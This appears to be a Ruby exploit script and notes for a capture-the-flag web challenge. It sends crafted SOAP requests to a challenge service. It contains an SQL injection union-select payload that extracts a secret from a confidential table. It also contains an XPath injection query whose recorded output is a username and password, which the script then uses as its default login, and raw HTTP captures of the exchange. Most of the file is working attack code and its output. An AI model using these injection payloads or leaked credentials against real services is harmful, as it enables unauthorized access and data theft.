require 'socket'

class String
	def stripxml
		gsub(/<.*?>/, '')
	end
end

def readhttp(s)
	h = s.readpartial 10240
	case h
	when /transfert-encoding: chunked/i
		loop do
			len = h.grep(/^\d+/).last.hex
			break if len == 0
			h << s.readpartial(1024)
		end
	end
	h
end

def request content
	TCPSocket.open('193.168.50.83', 8080) { |s| 
		s.puts "POST /challenge/services/MyWebService2 HTTP/1.1", "Content-Type: text/xml", "SOAPAction: \"\"", "Content-Length: #{content.length}", "Expect: 100-continue", "Host: 193.168.50.83:8080", ''
		readhttp s
		s.puts content
		puts readhttp(s).stripxml
	}
end

def login user, pass
	request <<EOC
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://192.168.144.129:8080/challenge/services/MyWebService2" xmlns:types="http://192.168.144.129:8080/challenge/services/MyWebService2/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<q1:RecupInfoConnection xmlns:q1="http://DefaultNamespace">
<in0 xsi:type="xsd:string">#{user}</in0>
<in1 xsi:type="xsd:string">#{pass}</in1>
<in2 xsi:type="xsd:string">jj</in2>
<in3 xsi:type="xsd:string">john@ofjj.net</in3>
</q1:RecupInfoConnection></soap:Body></soap:Envelope>
EOC
end

def search rq, user='siegbay_107', pass='acrois17$_08%'
	request <<EOC
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://192.168.144.129:8080/challenge/services/MyWebService2" xmlns:types="http://192.168.144.129:8080/challenge/services/MyWebService2/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<q1:RecupInfoSelection xmlns:q1="http://DefaultNamespace">
<in0 xsi:type="xsd:string">#{user}</in0>
<in1 xsi:type="xsd:string">#{pass}</in1>
<in2 xsi:type="xsd:string">#{rq}</in2>
<in3 xsi:type="xsd:string">jj</in3>
<in4 xsi:type="xsd:string">john@ofjj.net</in4>
</q1:RecupInfoSelection></soap:Body></soap:Envelope>
EOC
end

#login 'hubert', 'gaelle'
#search 'rodriguez', 'hubert', 'gaelle'

#search "xxxx' union select 0,__secretfusion___,'a' from __confidential__ limit 1 offset 0 -- "

__END__

Requete : //user[login/text()='bla' and false] | //user[2] | //user[false and login/text()='kikoo' and passwd/text()='lol']
-------
Retour de SAX :
  siegbay_107
  acrois17$_08%

	
POST /challenge/services/MyWebService2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 1.1.4322.2032)
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Content-Length: 785
Expect: 100-continue
Host: 193.168.50.83:8080


HTTP/1.1 100 Continue


<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://192.168.144.129:8080/challenge/services/MyWebService2" xmlns:types="http://192.168.144.129:8080/challenge/services/MyWebService2/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:RecupInfoConnection xmlns:q1="http://DefaultNamespace"><in0 xsi:type="xsd:string">hubert</in0><in1 xsi:type="xsd:string">gaelle</in1><in2 xsi:type="xsd:string">pseudo_user</in2><in3 xsi:type="xsd:string">mail_user@mail.com</in3></q1:RecupInfoConnection></soap:Body></soap:Envelope>

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml;charset=utf-8
Transfer-Encoding: chunked
Date: Thu, 27 Apr 2006 22:15:56 GMT

216
<?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><ns1:RecupInfoConnectionResponse soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:ns1="http://DefaultNamespace"><RecupInfoConnectionReturn xsi:type="xsd:string">2,Vous etes connecte hubert</RecupInfoConnectionReturn></ns1:RecupInfoConnectionResponse></soapenv:Body></soapenv:Envelope>

0


POST /challenge/services/MyWebService2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 1.1.4322.2032)
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Content-Length: 825
Expect: 100-continue
Host: 193.168.50.83:8080


HTTP/1.1 100 Continue


<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://192.168.144.129:8080/challenge/services/MyWebService2" xmlns:types="http://192.168.144.129:8080/challenge/services/MyWebService2/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:RecupInfoSelection xmlns:q1="http://DefaultNamespace"><in0 xsi:type="xsd:string">hubert</in0><in1 xsi:type="xsd:string">gaelle</in1><in2 xsi:type="xsd:string">rodriguez</in2><in3 xsi:type="xsd:string">pseudo_user</in3><in4 xsi:type="xsd:string">mail_user@mail.com</in4></q1:RecupInfoSelection></soap:Body></soap:Envelope>
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml;charset=utf-8
Transfer-Encoding: chunked
Date: Thu, 27 Apr 2006 22:15:58 GMT

20c
<?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><ns1:RecupInfoSelectionResponse soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:ns1="http://DefaultNamespace"><RecupInfoSelectionReturn xsi:type="xsd:string">2,rodriguez.096411112</RecupInfoSelectionReturn></ns1:RecupInfoSelectionResponse></soapenv:Body></soapenv:Envelope>

0